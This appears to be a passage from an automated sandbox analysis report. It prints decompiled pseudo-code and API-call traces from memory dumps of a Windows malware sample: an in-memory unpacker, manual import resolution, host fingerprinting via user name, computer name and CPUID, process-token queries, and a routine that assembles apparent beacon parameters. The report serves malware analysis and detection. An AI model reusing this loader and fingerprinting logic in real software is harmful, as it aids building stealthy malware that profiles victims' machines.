                  • HeapFree.KERNEL32(00000000,00000000,73797325), ref: 00BB8C00
                  • HeapFree.KERNEL32(00000000,?), ref: 00BB8C10
                  Memory Dump Source
                  • Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true
                  • Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp
                  • Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
                  • String ID:
                  • API String ID: 2944988578-0
                  • Opcode ID: e0496503ec2127c5aa0c5857ed32d51e7d0c084ae0f55c17473ee8233b3d8a7b
                  • Instruction ID: 78b739c22389a042aff727fedcf52dff461ba8aa7a575a0c6c922cc2e7259ed8
                  • Opcode Fuzzy Hash: e0496503ec2127c5aa0c5857ed32d51e7d0c084ae0f55c17473ee8233b3d8a7b
                  • Instruction Fuzzy Hash: CE810AB1900119EFDB21DFA5DC84AEEBBF9EF44300F1405AAE505E7260EBB59A45CB60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • VirtualAlloc.KERNELBASE(00000000,0000078E,00003000,00000040,0000078E,6E140D58), ref: 6E1413BF
                  • VirtualAlloc.KERNEL32(00000000,0000003D,00003000,00000040,6E140DBB), ref: 6E1413F6
                  • VirtualAlloc.KERNEL32(00000000,00012AF2,00003000,00000040), ref: 6E141456
                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E14148C
                  • VirtualProtect.KERNEL32(6E0C0000,00000000,00000004,6E1412E1), ref: 6E141591
                  • VirtualProtect.KERNEL32(6E0C0000,00001000,00000004,6E1412E1), ref: 6E1415B8
                  • VirtualProtect.KERNEL32(00000000,?,00000002,6E1412E1), ref: 6E141685
                  • VirtualProtect.KERNEL32(00000000,?,00000002,6E1412E1,?), ref: 6E1416DB
                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E1416F7
                  Memory Dump Source
                  • Source File: 00000000.00000002.474452249.000000006E140000.00000040.00020000.sdmp, Offset: 6E140000, based on PE: false
                  Similarity
                  • API ID: Virtual$Protect$Alloc$Free
                  • String ID:
                  • API String ID: 2574235972-0
                  • Opcode ID: 0f1f7b1b122eb33c6e72d88d935c3aa26e3bd9edeaa12e4efc1022abb1e4d76f
                  • Instruction ID: b136cb20ea30fcee9dfd9d58ef8b83c67fa73a1dcdf25729568b5ed2d3552465
                  • Opcode Fuzzy Hash: 0f1f7b1b122eb33c6e72d88d935c3aa26e3bd9edeaa12e4efc1022abb1e4d76f
                  • Instruction Fuzzy Hash: F5D16776208A08DFDB51CF5AC8C0B5277A6EF8C320B290595ED0A9F75AD770B850DBA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 69%
                  			E6E0C195D(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                  				intOrPtr _v12;
                  				struct _FILETIME* _v16;
                  				short _v60;
                  				struct _FILETIME* _t14;
                  				intOrPtr _t15;
                  				long _t18;
                  				void* _t19;
                  				void* _t22;
                  				intOrPtr _t31;
                  				long _t32;
                  				void* _t34;
                  
                  				_t31 = __edx;
                  				_t14 =  &_v16;
                  				GetSystemTimeAsFileTime(_t14);
                  				_push(0x192);
                  				_push(0x54d38000);
                  				_push(_v12);
                  				_push(_v16);
                  				L6E0C2130();
                  				_push(_t14);
                  				_v16 = _t14;
                  				_t15 =  *0x6e0c4144;
                  				_push(_t15 + 0x6e0c505e);
                  				_push(_t15 + 0x6e0c5054);
                  				_push(0x16);
                  				_push( &_v60);
                  				_v12 = _t31;
                  				L6E0C212A();
                  				_t18 = _a4;
                  				if(_t18 == 0) {
                  					_t18 = 0x1000;
                  				}
                  				_t19 = CreateFileMappingW(0xffffffff, 0x6e0c4148, 4, 0, _t18,  &_v60); // executed
                  				_t34 = _t19;
                  				if(_t34 == 0) {
                  					_t32 = GetLastError();
                  				} else {
                  					if(_a4 != 0 || GetLastError() == 0xb7) {
                  						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
                  						if(_t22 == 0) {
                  							_t32 = GetLastError();
                  							if(_t32 != 0) {
                  								goto L9;
                  							}
                  						} else {
                  							 *_a8 = _t34;
                  							 *_a12 = _t22;
                  							_t32 = 0;
                  						}
                  					} else {
                  						_t32 = 2;
                  						L9:
                  						CloseHandle(_t34);
                  					}
                  				}
                  				return _t32;
                  			}

                  APIs
                  • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,6E0C1791,0000000A,?,?), ref: 6E0C196A
                  • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6E0C1980
                  • _snwprintf.NTDLL ref: 6E0C19A5
                  • CreateFileMappingW.KERNELBASE(000000FF,6E0C4148,00000004,00000000,?,?), ref: 6E0C19CA
                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E0C1791,0000000A,?), ref: 6E0C19E1
                  • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 6E0C19F5
                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E0C1791,0000000A,?), ref: 6E0C1A0D
                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6E0C1791,0000000A), ref: 6E0C1A16
                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E0C1791,0000000A,?), ref: 6E0C1A1E
                  Memory Dump Source
                  • Source File: 00000000.00000002.473873275.000000006E0C1000.00000020.00020000.sdmp, Offset: 6E0C0000, based on PE: true
                  • Associated: 00000000.00000002.473861894.000000006E0C0000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.473885975.000000006E0C3000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.473899226.000000006E0C5000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.473916514.000000006E0C6000.00000002.00020000.sdmp
                  Similarity
                  • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                  • String ID:
                  • API String ID: 1724014008-0
                  • Opcode ID: 99a85712c0ab7657b87c8cfaa42a7f0472445e8495919cc1bb9972f5c5e60c29
                  • Instruction ID: d1a567735a38475fadde1d16d690314a3dc1cf619d6819f67635e3b402e64325
                  • Opcode Fuzzy Hash: 99a85712c0ab7657b87c8cfaa42a7f0472445e8495919cc1bb9972f5c5e60c29
                  • Instruction Fuzzy Hash: 0621C5B2910108BFDB10EFE8CC88FDE77BDEB49B94F204065FA19E7140D63499498B62
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 96%
                  			E00BB7EC1(char __eax, void* __esi) {
                  				long _v8;
                  				char _v12;
                  				signed int _v16;
                  				signed int _v20;
                  				signed int _v28;
                  				long _t34;
                  				signed int _t39;
                  				long _t50;
                  				char _t59;
                  				intOrPtr _t61;
                  				void* _t62;
                  				void* _t64;
                  				char _t65;
                  				intOrPtr* _t67;
                  				void* _t68;
                  				void* _t69;
                  
                  				_t69 = __esi;
                  				_t65 = __eax;
                  				_v8 = 0;
                  				_v12 = __eax;
                  				if(__eax == 0) {
                  					_t59 =  *0xbbd270; // 0xd448b889
                  					_v12 = _t59;
                  				}
                  				_t64 = _t69;
                  				E00BB7D4B( &_v12, _t64);
                  				if(_t65 != 0) {
                  					 *_t69 =  *_t69 ^  *0xbbd2a0 ^ 0x4c0ca0ae;
                  				} else {
                  					GetUserNameW(0,  &_v8); // executed
                  					_t50 = _v8;
                  					if(_t50 != 0) {
                  						_t62 = RtlAllocateHeap( *0xbbd238, 0, _t50 + _t50);
                  						if(_t62 != 0) {
                  							if(GetUserNameW(_t62,  &_v8) != 0) {
                  								_t64 = _t62;
                  								 *_t69 =  *_t69 ^ E00BBA28E(_v8 + _v8, _t64);
                  							}
                  							HeapFree( *0xbbd238, 0, _t62);
                  						}
                  					}
                  				}
                  				_t61 = __imp__;
                  				_v8 = _v8 & 0x00000000;
                  				GetComputerNameW(0,  &_v8);
                  				_t34 = _v8;
                  				if(_t34 != 0) {
                  					_t68 = RtlAllocateHeap( *0xbbd238, 0, _t34 + _t34);
                  					if(_t68 != 0) {
                  						if(GetComputerNameW(_t68,  &_v8) != 0) {
                  							_t64 = _t68;
                  							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E00BBA28E(_v8 + _v8, _t64);
                  						}
                  						HeapFree( *0xbbd238, 0, _t68);
                  					}
                  				}
                  				asm("cpuid");
                  				_t67 =  &_v28;
                  				 *_t67 = 1;
                  				 *((intOrPtr*)(_t67 + 4)) = _t61;
                  				 *((intOrPtr*)(_t67 + 8)) = 0;
                  				 *(_t67 + 0xc) = _t64;
                  				_t39 = _v16 ^ _v20 ^ _v28;
                  				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
                  				return _t39;
                  			}

                  APIs
                  • GetUserNameW.ADVAPI32(00000000,?), ref: 00BB7EF8
                  • RtlAllocateHeap.NTDLL(00000000,?), ref: 00BB7F0F
                  • GetUserNameW.ADVAPI32(00000000,?), ref: 00BB7F1C
                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00BB196C), ref: 00BB7F3D
                  • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00BB7F64
                  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00BB7F78
                  • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00BB7F85
                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00BB196C), ref: 00BB7FA3
                  Memory Dump Source
                  • Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true
                  • Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp
                  • Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: HeapName$AllocateComputerFreeUser
                  • String ID:
                  • API String ID: 3239747167-0
                  • Opcode ID: e44575117f3b0b78101b3979a89c2b322076fd053762118d11d3db02ff2a4d52
                  • Instruction ID: aa27c211d49d4438e90324ba143a6568f5546570d6a94a52e7258cc3ad505fad
                  • Opcode Fuzzy Hash: e44575117f3b0b78101b3979a89c2b322076fd053762118d11d3db02ff2a4d52
                  • Instruction Fuzzy Hash: 7C311871A44249AFDB10DFA8CC81ABEF7F9EF84300F6141A9E504D7220EBB0DE019B14
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 38%
                  			E00BB1724(char _a4, void* _a8) {
                  				void* _v8;
                  				void* _v12;
                  				char _v16;
                  				void* _v20;
                  				char _v24;
                  				char _v28;
                  				char _v32;
                  				char _v36;
                  				char _v40;
                  				void* _v44;
                  				void** _t33;
                  				void* _t40;
                  				void* _t43;
                  				void** _t44;
                  				intOrPtr* _t47;
                  				char _t48;
                  
                  				asm("stosd");
                  				asm("stosd");
                  				asm("stosd");
                  				asm("stosd");
                  				asm("stosd");
                  				_v20 = _a4;
                  				_t48 = 0;
                  				_v16 = 0;
                  				_a4 = 0;
                  				_v44 = 0x18;
                  				_v40 = 0;
                  				_v32 = 0;
                  				_v36 = 0;
                  				_v28 = 0;
                  				_v24 = 0;
                  				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                  					_t33 =  &_v8;
                  					__imp__(_v12, 8, _t33);
                  					if(_t33 >= 0) {
                  						_t47 = __imp__;
                  						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                  						_t44 = E00BB98E4(_a4);
                  						if(_t44 != 0) {
                  							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                  							if(_t40 >= 0) {
                  								memcpy(_a8,  *_t44, 0x1c);
                  								_t48 = 1;
                  							}
                  							E00BB5DE8(_t44);
                  						}
                  						NtClose(_v8); // executed
                  					}
                  					NtClose(_v12);
                  				}
                  				return _t48;
                  			}




















                  APIs
                  • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 00BB176B
                  • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 00BB177E
                  • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 00BB179A
                    • Part of subcall function 00BB98E4: RtlAllocateHeap.NTDLL(00000000,00000000,00BB6788), ref: 00BB98F0
                  • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 00BB17B7
                  • memcpy.NTDLL(00000000,00000000,0000001C), ref: 00BB17C4
                  • NtClose.NTDLL(?), ref: 00BB17D6
                  • NtClose.NTDLL(00000000), ref: 00BB17E0
                  Memory Dump Source
                  • Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true
                  • Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp
                  • Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                  • String ID:
                  • API String ID: 2575439697-0
                  • Opcode ID: 005cc2dab782bba5841a82de3a8fa8af728400f3c6c8511f464acfe6de7646c6
                  • Instruction ID: 8d2a3ac37d81be957266ef697504b5de68b4651a6958d10f51c78cd9f24657fb
                  • Opcode Fuzzy Hash: 005cc2dab782bba5841a82de3a8fa8af728400f3c6c8511f464acfe6de7646c6
                  • Instruction Fuzzy Hash: 3B21D6B2900118AFDB01DF99CC85EEEBFBDEF08750F104166F504F6160D7B19A449BA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 72%
                  			E6E0C145E(intOrPtr* __eax, void** _a4) {
                  				int _v12;
                  				void* _v16;
                  				void* _v20;
                  				void* _v24;
                  				int _v28;
                  				int _v32;
                  				intOrPtr _v36;
                  				int _v40;
                  				int _v44;
                  				void* _v48;
                  				void* __esi;
                  				long _t34;
                  				void* _t39;
                  				void* _t47;
                  				intOrPtr* _t48;
                  
                  				_t48 = __eax;
                  				asm("stosd");
                  				asm("stosd");
                  				asm("stosd");
                  				asm("stosd");
                  				asm("stosd");
                  				asm("stosd");
                  				_v24 =  *((intOrPtr*)(__eax + 4));
                  				_v16 = 0;
                  				_v12 = 0;
                  				_v48 = 0x18;
                  				_v44 = 0;
                  				_v36 = 0x40;
                  				_v40 = 0;
                  				_v32 = 0;
                  				_v28 = 0;
                  				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                  				if(_t34 < 0) {
                  					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                  				} else {
                  					 *_t48 = _v16;
                  					_t39 = E6E0C101B(_t48,  &_v12); // executed
                  					_t47 = _t39;
                  					if(_t47 != 0) {
                  						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                  					} else {
                  						memset(_v12, 0, _v24);
                  						 *_a4 = _v12;
                  					}
                  				}
                  				return _t47;
                  			}



















                  APIs
                  • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000), ref: 6E0C14BB
                    • Part of subcall function 6E0C101B: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,?,?,00000002,00000000,?), ref: 6E0C1048
                  • memset.NTDLL ref: 6E0C14DD
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.473873275.000000006E0C1000.00000020.00020000.sdmp, Offset: 6E0C0000, based on PE: true
                  • Associated: 00000000.00000002.473861894.000000006E0C0000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.473885975.000000006E0C3000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.473899226.000000006E0C5000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.473916514.000000006E0C6000.00000002.00020000.sdmp
                  Similarity
                  • API ID: Section$CreateViewmemset
                  • String ID: @
                  • API String ID: 2533685722-2766056989
                  • Opcode ID: a4bb7986d80d4062f7d0166ba0705add4a49f6f95bba2aaeadc335ae39e1f72b
                  • Instruction ID: c2f026b932a85621844264794340aa5a585a0570bae08726202cc0d578d86012
                  • Opcode Fuzzy Hash: a4bb7986d80d4062f7d0166ba0705add4a49f6f95bba2aaeadc335ae39e1f72b
                  • Instruction Fuzzy Hash: DE210BB1D00209AFDB11CFE9C8849DEFBB9FF48354F108469E605F3210D7359A498B61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E6E0C160D(void* __edi, intOrPtr _a4) {
                  				signed int _v8;
                  				intOrPtr* _v12;
                  				_Unknown_base(*)()** _v16;
                  				signed int _v20;
                  				signed short _v24;
                  				struct HINSTANCE__* _v28;
                  				intOrPtr _t43;
                  				intOrPtr* _t45;
                  				intOrPtr _t46;
                  				struct HINSTANCE__* _t47;
                  				intOrPtr* _t49;
                  				intOrPtr _t50;
                  				signed short _t51;
                  				_Unknown_base(*)()* _t53;
                  				CHAR* _t54;
                  				_Unknown_base(*)()* _t55;
                  				void* _t58;
                  				signed int _t59;
                  				_Unknown_base(*)()* _t60;
                  				intOrPtr _t61;
                  				intOrPtr _t65;
                  				signed int _t68;
                  				void* _t69;
                  				CHAR* _t71;
                  				signed short* _t73;
                  
                  				_t69 = __edi;
                  				_v20 = _v20 & 0x00000000;
                  				_t59 =  *0x6e0c4140;
                  				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
                  				if(_t43 != 0) {
                  					_t45 = _t43 + __edi;
                  					_v12 = _t45;
                  					_t46 =  *((intOrPtr*)(_t45 + 0xc));
                  					if(_t46 != 0) {
                  						while(1) {
                  							_t71 = _t46 + _t69;
                  							_t47 = LoadLibraryA(_t71); // executed
                  							_v28 = _t47;
                  							if(_t47 == 0) {
                  								break;
                  							}
                  							_v24 = _v24 & 0x00000000;
                  							 *_t71 = _t59 - 0x63699bc3;
                  							_t49 = _v12;
                  							_t61 =  *((intOrPtr*)(_t49 + 0x10));
                  							_t50 =  *_t49;
                  							if(_t50 != 0) {
                  								L6:
                  								_t73 = _t50 + _t69;
                  								_v16 = _t61 + _t69;
                  								while(1) {
                  									_t51 =  *_t73;
                  									if(_t51 == 0) {
                  										break;
                  									}
                  									if(__eflags < 0) {
                  										__eflags = _t51 - _t69;
                  										if(_t51 < _t69) {
                  											L12:
                  											_t21 =  &_v8;
                  											 *_t21 = _v8 & 0x00000000;
                  											__eflags =  *_t21;
                  											_v24 =  *_t73 & 0x0000ffff;
                  										} else {
                  											_t65 = _a4;
                  											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
                  											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
                  												goto L12;
                  											} else {
                  												goto L11;
                  											}
                  										}
                  									} else {
                  										_t51 = _t51 + _t69;
                  										L11:
                  										_v8 = _t51;
                  									}
                  									_t53 = _v8;
                  									__eflags = _t53;
                  									if(_t53 == 0) {
                  										_t54 = _v24 & 0x0000ffff;
                  									} else {
                  										_t54 = _t53 + 2;
                  									}
                  									_t55 = GetProcAddress(_v28, _t54);
                  									__eflags = _t55;
                  									if(__eflags == 0) {
                  										_v20 = _t59 - 0x63699b44;
                  									} else {
                  										_t68 = _v8;
                  										__eflags = _t68;
                  										if(_t68 != 0) {
                  											 *_t68 = _t59 - 0x63699bc3;
                  										}
                  										 *_v16 = _t55;
                  										_t58 = 0x725990f8 + _t59 * 4;
                  										_t73 = _t73 + _t58;
                  										_t32 =  &_v16;
                  										 *_t32 = _v16 + _t58;
                  										__eflags =  *_t32;
                  										continue;
                  									}
                  									goto L23;
                  								}
                  							} else {
                  								_t50 = _t61;
                  								if(_t61 != 0) {
                  									goto L6;
                  								}
                  							}
                  							L23:
                  							_v12 = _v12 + 0x14;
                  							_t46 =  *((intOrPtr*)(_v12 + 0xc));
                  							if(_t46 != 0) {
                  								continue;
                  							} else {
                  							}
                  							L26:
                  							goto L27;
                  						}
                  						_t60 = _t59 + 0x9c9664bb;
                  						__eflags = _t60;
                  						_v20 = _t60;
                  						goto L26;
                  					}
                  				}
                  				L27:
                  				return _v20;
                  			}





























                  APIs
                  • LoadLibraryA.KERNELBASE ref: 6E0C1645
                  • GetProcAddress.KERNEL32(?,00000000), ref: 6E0C16B7
                  Memory Dump Source
                  • Source File: 00000000.00000002.473873275.000000006E0C1000.00000020.00020000.sdmp, Offset: 6E0C0000, based on PE: true
                  • Associated: 00000000.00000002.473861894.000000006E0C0000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.473885975.000000006E0C3000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.473899226.000000006E0C5000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.473916514.000000006E0C6000.00000002.00020000.sdmp
                  Similarity
                  • API ID: AddressLibraryLoadProc
                  • String ID:
                  • API String ID: 2574300362-0
                  • Opcode ID: 9f5ed742f40d0c9e05ec254f971ff86886f2bd162783dc73983269f1424b51bc
                  • Instruction ID: b347e80a15261ee0a03239e8c07ff1defedaca92c8e781df42ae0061b8183f6c
                  • Opcode Fuzzy Hash: 9f5ed742f40d0c9e05ec254f971ff86886f2bd162783dc73983269f1424b51bc
                  • Instruction Fuzzy Hash: 84312871A00207DFDB40CF99C894BAEB7F8BF05B55B2840A9D811E7241E774DA49CB92
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 68%
                  			E6E0C101B(void** __esi, PVOID* _a4) {
                  				long _v8;
                  				void* _v12;
                  				void* _v16;
                  				long _t13;
                  
                  				_v16 = 0;
                  				asm("stosd");
                  				_v8 = 0;
                  				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                  				if(_t13 < 0) {
                  					_push(_t13);
                  					return __esi[6]();
                  				}
                  				return 0;
                  			}








                  APIs
                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,?,?,00000002,00000000,?), ref: 6E0C1048
                  Memory Dump Source
                  • Source File: 00000000.00000002.473873275.000000006E0C1000.00000020.00020000.sdmp, Offset: 6E0C0000, based on PE: true
                  • Associated: 00000000.00000002.473861894.000000006E0C0000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.473885975.000000006E0C3000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.473899226.000000006E0C5000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.473916514.000000006E0C6000.00000002.00020000.sdmp
                  Similarity
                  • API ID: SectionView
                  • String ID:
                  • API String ID: 1323581903-0
                  • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                  • Instruction ID: 1675dd8756ccd8ed5c7bc3c2edee49f2c2dd08c69cae5748b9f9c5f374ea3e37
                  • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                  • Instruction Fuzzy Hash: BAF012B590020CBFEB119FE5CC85D9FBBBDEB44394B108939F152E1090D6709E089A61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 74%
                  			E00BB9DB0(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
                  				void* _v8;
                  				signed int _v12;
                  				void* _v16;
                  				void* _v20;
                  				void* _v24;
                  				void* _v28;
                  				void* __ebx;
                  				void* __edi;
                  				long _t59;
                  				intOrPtr _t60;
                  				intOrPtr _t61;
                  				intOrPtr _t62;
                  				intOrPtr _t63;
                  				intOrPtr _t64;
                  				void* _t67;
                  				intOrPtr _t68;
                  				int _t71;
                  				void* _t72;
                  				void* _t73;
                  				void* _t75;
                  				void* _t78;
                  				intOrPtr _t82;
                  				intOrPtr _t86;
                  				intOrPtr* _t88;
                  				void* _t94;
                  				intOrPtr _t101;
                  				signed int _t105;
                  				char** _t107;
                  				int _t110;
                  				intOrPtr* _t113;
                  				intOrPtr* _t115;
                  				intOrPtr* _t117;
                  				intOrPtr* _t119;
                  				intOrPtr _t122;
                  				intOrPtr _t127;
                  				int _t131;
                  				CHAR* _t133;
                  				intOrPtr _t134;
                  				void* _t135;
                  				void* _t144;
                  				int _t145;
                  				void* _t146;
                  				intOrPtr _t147;
                  				void* _t149;
                  				long _t153;
                  				intOrPtr* _t154;
                  				intOrPtr* _t155;
                  				intOrPtr* _t158;
                  				void* _t159;
                  				void* _t161;
                  
                  				_t144 = __edx;
                  				_t135 = __ecx;
                  				_t59 = __eax;
                  				_v12 = 8;
                  				if(__eax == 0) {
                  					_t59 = GetTickCount();
                  				}
                  				_t60 =  *0xbbd018; // 0xd4967592
                  				asm("bswap eax");
                  				_t61 =  *0xbbd014; // 0x3a87c8cd
                  				_t133 = _a16;
                  				asm("bswap eax");
                  				_t62 =  *0xbbd010; // 0xd8d2f808
                  				asm("bswap eax");
                  				_t63 =  *0xbbd00c; // 0xeec43f25
                  				asm("bswap eax");
                  				_t64 =  *0xbbd2a4; // 0x2a5a5a8
                  				_t3 = _t64 + 0xbbe633; // 0x74666f73
                  				_t145 = wsprintfA(_t133, _t3, 3, 0x3d153, _t63, _t62, _t61, _t60,  *0xbbd02c,  *0xbbd004, _t59);
                  				_t67 = E00BBA358();
                  				_t68 =  *0xbbd2a4; // 0x2a5a5a8
                  				_t4 = _t68 + 0xbbe673; // 0x74707526
                  				_t71 = wsprintfA(_t145 + _t133, _t4, _t67);
                  				_t161 = _t159 + 0x38;
                  				_t146 = _t145 + _t71; // executed
                  				_t72 = E00BB5369(_t135); // executed
                  				_t134 = __imp__;
                  				_v8 = _t72;
                  				if(_t72 != 0) {
                  					_t127 =  *0xbbd2a4; // 0x2a5a5a8
                  					_t7 = _t127 + 0xbbe8eb; // 0x736e6426
                  					_t131 = wsprintfA(_a16 + _t146, _t7, _t72);
                  					_t161 = _t161 + 0xc;
                  					_t146 = _t146 + _t131;
                  					HeapFree( *0xbbd238, 0, _v8);
                  				}
                  				_t73 = E00BBA0B7();
                  				_v8 = _t73;
                  				if(_t73 != 0) {
                  					_t122 =  *0xbbd2a4; // 0x2a5a5a8
                  					_t11 = _t122 + 0xbbe8f3; // 0x6f687726
                  					wsprintfA(_t146 + _a16, _t11, _t73);
                  					_t161 = _t161 + 0xc;
                  					HeapFree( *0xbbd238, 0, _v8);
                  				}
                  				_t147 =  *0xbbd32c; // 0x36195b0
                  				_t75 = E00BB3802(0xbbd00a, _t147 + 4);
                  				_t153 = 0;
                  				_v20 = _t75;
                  				if(_t75 == 0) {
                  					L26:
                  					HeapFree( *0xbbd238, _t153, _a16);
                  					return _v12;
                  				} else {
                  					_t78 = RtlAllocateHeap( *0xbbd238, 0, 0x800);
                  					_v8 = _t78;
                  					if(_t78 == 0) {
                  						L25:
                  						HeapFree( *0xbbd238, _t153, _v20);
                  						goto L26;
                  					}
                  					E00BB10BF(GetTickCount());
                  					_t82 =  *0xbbd32c; // 0x36195b0
                  					__imp__(_t82 + 0x40);
                  					asm("lock xadd [eax], ecx");
                  					_t86 =  *0xbbd32c; // 0x36195b0
                  					__imp__(_t86 + 0x40);
                  					_t88 =  *0xbbd32c; // 0x36195b0
                  					_t149 = E00BB61B9(1, _t144, _a16,  *_t88);
                  					_v28 = _t149;
                  					asm("lock xadd [eax], ecx");
                  					if(_t149 == 0) {
                  						L24:
                  						HeapFree( *0xbbd238, _t153, _v8);
                  						goto L25;
                  					}
                  					StrTrimA(_t149, 0xbbc2ac);
                  					_push(_t149);
                  					_t94 = E00BBA755();
                  					_v16 = _t94;
                  					if(_t94 == 0) {
                  						L23:
                  						HeapFree( *0xbbd238, _t153, _t149);
                  						goto L24;
                  					}
                  					_t154 = __imp__;
                  					 *_t154(_t149, _a4);
                  					 *_t154(_v8, _v20);
                  					_t155 = __imp__;
                  					 *_t155(_v8, _v16);
                  					 *_t155(_v8, _t149);
                  					_t101 = E00BB8ECC(0, _v8);
                  					_a4 = _t101;
                  					if(_t101 == 0) {
                  						_v12 = 8;
                  						L21:
                  						E00BB14EF();
                  						L22:
                  						HeapFree( *0xbbd238, 0, _v16);
                  						_t153 = 0;
                  						goto L23;
                  					}
                  					_t105 = E00BBA617(_t134, 0xffffffffffffffff, _t149,  &_v24); // executed
                  					_v12 = _t105;
                  					if(_t105 == 0) {
                  						_t158 = _v24;
                  						_v12 = E00BB1A34(_t158, _a4, _a8, _a12);
                  						_t113 =  *((intOrPtr*)(_t158 + 8));
                  						 *((intOrPtr*)( *_t113 + 0x80))(_t113);
                  						_t115 =  *((intOrPtr*)(_t158 + 8));
                  						 *((intOrPtr*)( *_t115 + 8))(_t115);
                  						_t117 =  *((intOrPtr*)(_t158 + 4));
                  						 *((intOrPtr*)( *_t117 + 8))(_t117);
                  						_t119 =  *_t158;
                  						 *((intOrPtr*)( *_t119 + 8))(_t119);
                  						E00BB5DE8(_t158);
                  					}
                  					if(_v12 != 0x10d2) {
                  						L16:
                  						if(_v12 == 0) {
                  							_t107 = _a8;
                  							if(_t107 != 0) {
                  								_t150 =  *_t107;
                  								_t156 =  *_a12;
                  								wcstombs( *_t107,  *_t107,  *_a12);
                  								_t110 = E00BB4C8F(_t150, _t150, _t156 >> 1);
                  								_t149 = _v28;
                  								 *_a12 = _t110;
                  							}
                  						}
                  						goto L19;
                  					} else {
                  						if(_a8 != 0) {
